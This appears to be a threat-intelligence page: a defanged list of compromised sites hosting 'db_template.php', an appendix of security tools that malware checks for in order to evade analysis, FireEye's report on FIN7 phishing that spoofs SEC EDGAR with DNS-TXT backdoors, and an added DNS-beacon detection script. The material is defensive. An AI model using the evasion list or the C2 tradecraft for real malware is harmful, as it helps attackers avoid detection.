hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php

hxxp://americabr[.]com.br//db_template.php

hxxp://andrew-snyder[.]net/bootstrap/db_template.php

hxxp://signsoftime[.]co.za//db_template.php

hxxp://aperta-armis[.]org//db_template.php

hxxp://absfinancialplanning[.]co.za/images/db_template.php

hxxp://charispaarl[.]co.za//db_template.php

hxxp://indlovusecurity[.]co.za//db_template.php

hxxp://alcafricandatalab[.]com//db_template.php

hxxp://amor-clubhotels[.]com//db_template.php

hxxp://mokorotlocorporate[.]com//db_template.php

hxxp://apppriori[.]com//db_template.php

hxxp://luxconprojects[.]co.za//db_template.php

hxxp://androidphonetips[.]com/wp-includes/db_template.php

hxxp://angel-seeds[.]com.ua/catalog/db_template.php

hxxp://alissanicolai[.]com/assets/db_template.php

hxxps://www.amateurastronomy[.]org//db_template.php

hxxp://aiofotoevideo[.]com//db_template.php

hxxp://www.amika.hr//db_template.php

hxxp://comfortex[.]co.za/php/db_template.php

hxxp://deepgraphics[.]co.za//db_template.php

hxxps://agiledepot[.]com//db_template.php

hxxp://almatours[.]gr//db_template.php

hxxp://analystcnwang[.]com//db_template.php

hxxp://www.malboer[.]co.za/trendy1/db_template.php

hxxp://sefikengfarm.co.ls//db_template.php

hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php

hxxp://passright[.]co.za//db_template.php

hxxp://seismicfactory[.]co.za//db_template.php

hxxp://alessandroalessandrini[.]it//db_template.php

hxxps://aquabsafe[.]com//db_template.php

hxxp://amatikulutours[.]com/tmp/db_template.php

hxxp://ganitis[.]gr//db_template.php

hxxp://aleenasgiftbox[.]com/admin/db_template.php

hxxps://allusdoctors[.]com/themes/db_template.php

hxxp://alainsaffel[.]com//db_template.php

hxxp://www.ariehandomri[.]com//db_template.php

hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php

hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php

hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php

hxxp://www.albertamechanical[.]ca//db_template.php

hxxp://alchamel[.]info//db_template.php

hxxps://almokan[.]net/wp-includes/db_template.php

hxxp://jakobieducation[.]co.za//db_template.php

hxxps://arc-sec[.]net//db_template.php

hxxp://ldams[.]org.ls/supplies/db_template.php

hxxp://menaboracks[.]co.za/tmp/db_template.php

hxxp://www.getcord[.]co.za//db_template.php

hxxp://boardaffairs[.]com//db_template.php

hxxp://capetownway[.]co.za//db_template.php

hxxp://cloudhostdesign[.]com//db_template.php

hxxp://hartenboswaterpark[.]co.za/templates/db_template.php

hxxp://fccorp[.]co.za/php/db_template.php

hxxp://angar68[.]com//db_template.php

hxxp://www.dws-gov[.]co.za//db_template.php

hxxp://alwahahweb[.]com//db_template.php

hxxp://anuragcreatives[.]com//db_template.php

hxxp://embali[.]co.za//db_template.php

hxxp://albertaedmonton[.]com/widgetstyles/db_template.php

hxxp://altosdefontana[.]com//db_template.php

hxxp://airfanhydro[.]net//db_template.php

hxxps://www.alexponcet[.]com/wp-includes/db_template.php

hxxp://agropecuariavilarica[.]com.br//db_template.php

hxxps://www.amazingbuyrd[.]com/admin/db_template.php

hxxp://cdxtrading[.]co.za//db_template.php

hxxp://interafricaconsulting[.]com/wpimages/db_template.php

hxxp://glgroup[.]co.za/images/db_template.php

hxxp://hisandherskennels[.]co.za/php/db_template.php

hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php

hxxp://isibaniedu[.]co.za/admin/db_template.php

hxxp://dianakleyn[.]co.za/layouts/db_template.php

hxxp://themotoringcalendar[.]co.za//db_template.php

hxxp://www.loansonhomes[.]co.za//db_template.php

hxxp://edgesecurity[.]co.za/js/db_template.php

hxxp://highschoolsuperstar[.]co.za/files/db_template.php

hxxp://www.ambientproperty[.]com//db_template.php

hxxp://animationshowreel[.]co.il//db_template.php

hxxp://cafawelding[.]co.za/font-awesome/db_template.php

hxxp://apalawyers.pt//db_template.php

hxxp://www.edesignz[.]co.za//db_template.php

hxxp://centuryacademy[.]co.za/css/db_template.php

hxxps://ambyenta.hr//db_template.php

hxxp://ceramica[.]co.za//db_template.php

hxxp://www.alfredoposada[.]com//db_template.php

hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php

hxxp://allisonplumbing[.]com/wp-includes/db_template.php

hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php

hxxp://angelsongroup[.]com/wp-includes/db_template.php

hxxp://www.mikimaths[.]com//db_template.php

hxxp://hjb-racing[.]co.za/htdocs/db_template.php

hxxp://anotherpartofme[.]com/wp-includes/db_template.php

hxxp://www.andreabelfi[.]com//db_template.php

hxxp://www.iancullen[.]co.za//db_template.php

hxxp://alaskamaterials[.]com//db_template.php

hxxp://jeanetteproperties[.]co.za//db_template.php

hxxp://www.digitalmedia[.]co.za//db_template.php

hxxp://www.rejoicetheatre[.]com//db_template.php

hxxps://alterwebhost[.]com//db_template.php

hxxp://bc-u[.]co[.]uk//db_template.php

hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php

hxxp://edgeforensic[.]co.za//db_template.php

hxxp://willpowerpos[.]co.za//db_template.php

hxxp://antrismode[.]com/wp-includes/db_template.php

hxxp://colenesphotography[.]co.za/modules/db_template.php

hxxp://anthaigroup.vn//db_template.php

hxxps://alphainvestors[.]com.au//db_template.php

hxxps://aliart[.]nl//db_template.php

hxxps://allmantravel[.]com/thumbs/db_template.php

hxxp://fbrvolume[.]co.za//db_template.php

hxxp://amordegato[.]es/storefront/db_template.php

hxxp://agylub[.]com//db_template.php

hxxp://www.khotsonglodge.co.ls//db_template.php

hxxp://ampli5yd[.]com//db_template.php

hxxps://animeok[.]co.il//db_template.php

hxxps://arbeidsrechtcentrum[.]nl//db_template.php

hxxp://erniecommunications[.]co.za/js/db_template.php

hxxp://promechtransport[.]co.za/scripts/db_template.php

hxxp://centuriongsd[.]co.za//db_template.php

hxxp://www.agencesylvieleclerc[.]com//db_template.php

hxxp://delcom[.]co.za//db_template.php

hxxps://aleoestudio[.]com/gallonature/db_template.php

hxxp://oftheearthphotography[.]com/www/db_template.php

hxxp://h-dubepromotions[.]co.za//db_template.php

hxxp://www.alessioborzuola[.]com/downloads/db_template.php

hxxp://crystaltidings[.]co.za//db_template.php

hxxp://funeralbusinesssolution[.]com/email_template/db_template.php

hxxp://funisalodge[.]co.za/data1/db_template.php

hxxp://experttutors[.]co.za//db_template.php

hxxps://www[.]cartridgecave[.]co.za//db_template.php

hxxp://ecs-consult[.]com//db_template.php

hxxp://www.animationinisrael[.]org/tmp_images/db_template.php

hxxp://gideonitesprojects[.]com//db_template.php

hxxp://hybridauto[.]co.za/photography/db_template.php

hxxp://africanpixels.zar.cc//db_template.php

hxxp://ryanchristiefurniture[.]co.za//db_template.php

hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php

hxxp://almeriahotelja[.]com/dk/db_template.php

hxxp://al3abflash[.]biz//db_template.php

hxxp://www.fun4kidz[.]co.za//db_template.php

hxxp://alsharhanstore[.]com//db_template.php

hxxp://www[.]infratechconsulting[.]com//db_template.php

hxxp://algihad[.]com/assets/db_template.php

hxxp://americanwestmedia[.]com//db_template.php

hxxp://charliewestsecurity[.]co.za//db_template.php

hxxp://beehiveholdingszar[.]co.za//db_template.php

hxxp://analyticalfootball[.]com//db_template.php

hxxp://apiiination[.]com/leadership/db_template.php

hxxps://ahelicoptermom[.]com/wp-includes/db_template.php

hxxp://servicebox[.]co.za//db_template.php

hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php

hxxps://aquo[.]in//db_template.php

hxxps://www.alfransia[.]com/wp-admin/db_template.php

hxxp://www.icsswaziland[.]com//db_template.php

hxxp://aiko.pro//db_template.php

hxxps://alceharfield[.]com//db_template.php

hxxp://indocraft[.]co.za/test/db_template.php

hxxp://allegiancesecurity[.]org//db_template.php

hxxp://sullivanprimary[.]co.za//db_template.php

hxxp://www.apmequestrian[.]com//db_template.php

hxxps://alphawaves[.]org/wp-admin/db_template.php

hxxp://www.alexandrasternin[.]com/illustration/db_template.php

hxxp://www.daleth[.]co.za//db_template.php

hxxp://jwseshowe[.]co.za/assets/db_template.php

hxxp://winagainstebola[.]com//db_template.php

hxxp://anubandh[.]in//db_template.php

hxxp://www.alexanderhomestead[.]com//db_template.php

hxxp://alfatek-intelligence[.]com//db_template.php

hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php

hxxp://alorabrownies[.]com/wp-admin/db_template.php

hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php

hxxp://cazochem[.]co.za/cazochem/db_template.php

hxxp://debnoch[.]com/image/db_template.php

hxxp://hmholdings360[.]co.za//db_template.php

hxxp://iinvest4u[.]co.za//db_template.php

hxxp://burgercoetzeeattorneys[.]co.za//db_template.php

hxxp://anngrigphoto[.]com//db_template.php

hxxp://alchemistasonida[.]com//db_template.php

hxxp://anahera[.]biz/admin/db_template.php

hxxp://h-u-i[.]co.za/heiren/db_template.php

hxxp://insta-art[.]co.za//db_template.php

hxxp://muallematsela[.]com//db_template.php

hxxp://aguasdecastilla[.]com/uploads/db_template.php


Appendix

Security Tools Checked on the Machine

  • win32_remote
  • win64_remote64
  • ollydbg
  • ProcessHacker
  • tcpview
  • autoruns
  • autorunsc
  • filemon
  • procmon
  • regmon
  • procexp
  • idaq
  • idaq64
  • ImmunityDebugger
  • Wireshark
  • dumpcap
  • HookExplorer
  • ImportREC
  • PETools
  • LordPE
  • dumpcap
  • SysInspector
  • proc_analyzer
  • sysAnalyzer
  • sniff_hit
  • windbg
  • joeboxcontrol
  • joeboxserver

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <filings@sec.gov> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013, likely because it makes detection and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.
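As an added illustration of the detection problem that DNS TXT command and control poses (example code written for this page, not FireEye's tooling or the malware's own code), the following Python scores a resolver log for bursts of unique, high-entropy TXT queries to a single domain, the pattern left when commands and results are tunnelled through TXT records. The log lines, the client addresses and the C2 domain are constructed placeholders, and the "last two labels" domain heuristic is an assumption that stands in for a public-suffix list.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines (not from the original page); the C2 domain is a
# placeholder. Line format: "<timestamp> <client_ip> <qname> <qtype>".
SAMPLE_LOG = """\
2017-02-27T10:00:01 10.1.2.3 www.example.com A
2017-02-27T10:00:02 10.1.2.3 _dmarc.example.com TXT
2017-02-27T10:00:05 10.1.2.3 ab3kz9pq1xw7.cmd.c2-placeholder.test TXT
2017-02-27T10:00:06 10.1.2.3 m4nq8e2rty6u.cmd.c2-placeholder.test TXT
2017-02-27T10:00:07 10.1.2.3 z1c5vbx3hj9k.cmd.c2-placeholder.test TXT
2017-02-27T10:00:08 10.1.2.3 q0w9e8r7t6yu.cmd.c2-placeholder.test TXT
2017-02-27T10:00:09 10.1.2.3 p2o3i4u5y6tr.cmd.c2-placeholder.test TXT
2017-02-27T10:00:10 10.1.2.9 _acme-challenge.example.org TXT
"""


def shannon_entropy(label):
    """Bits per character; encoded command/response chunks score high, plain words low."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def registered_domain(qname):
    # Assumption: the last two labels approximate the registrable domain (no suffix list).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_txt_beacons(log_text, min_queries=5, min_entropy=3.0):
    """Group TXT queries per (client, domain) and flag bursts of unique, high-entropy labels."""
    stats = defaultdict(lambda: {"count": 0, "labels": set(), "entropy": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[3] != "TXT":
            continue  # only TXT queries matter for this C2 channel
        _ts, client, qname, _qtype = parts
        leftmost = qname.split(".")[0]  # the label that would carry encoded data
        s = stats[(client, registered_domain(qname))]
        s["count"] += 1
        s["labels"].add(leftmost)
        s["entropy"] += shannon_entropy(leftmost)
    alerts = []
    for (client, domain), s in stats.items():
        mean_entropy = s["entropy"] / s["count"]
        # Legitimate TXT lookups (SPF, DMARC, ACME) are few and reuse fixed labels.
        if s["count"] >= min_queries and len(s["labels"]) == s["count"] and mean_entropy >= min_entropy:
            alerts.append({"client": client, "domain": domain,
                           "txt_queries": s["count"], "mean_label_entropy": round(mean_entropy, 2)})
    return alerts
```

Running `find_txt_beacons(SAMPLE_LOG)` flags only the placeholder C2 domain; the DMARC and ACME lookups fall below the query threshold and are ignored.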

Victims

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.

Implications

We have not yet identified FIN7’s ultimate goal in this campaign, as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft. However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the malware. Detections were then quickly deployed to the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware.